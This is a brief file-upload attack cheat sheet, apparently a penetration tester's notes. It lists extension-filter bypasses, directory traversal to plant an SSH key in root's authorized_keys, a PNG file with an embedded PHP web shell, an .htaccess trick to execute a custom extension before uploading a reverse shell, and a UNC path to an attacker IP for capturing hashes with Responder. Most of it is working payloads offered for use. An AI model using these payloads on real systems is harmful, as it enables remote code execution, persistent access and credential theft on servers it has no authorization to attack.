File Upload

.pHP        .php%00        .asp        .pl
.phps       .php%20        .aspx       .cgi
.php2-7     .php%0a        .ashx
.phar       .php%00.png    .jsp
.phtml      .php#png       .jspx
.pht        .png.php       .jsw

If the web application indicates that the file already exists, we can use this method to brute force the contents of a web server

Combined with directory traversal

../../../../../../../test.txt
../../../../../../../root/.ssh/authorized_keys    <-- include public key

Magic Bytes

Only include the first and last bytes of an approved file type and inject php code in the middle

�PNG
����lk�7�,ZtSoftwareAdobe ImageReadyq�e<3�IDATx���
 <?php system($_GET['cmd']); ����lk�7�,
����lk�7�,

.htaccess

Upload a new .htaccess file and allow a new file extension to be executed

AddType application/x-httpd-php .pwned

Now upload a reverse shell with the .pwned extension

Responder + File upload

Spin up responder and change file name to share and watch the hashes fly

"\\\\192.168.45.237\\adot8"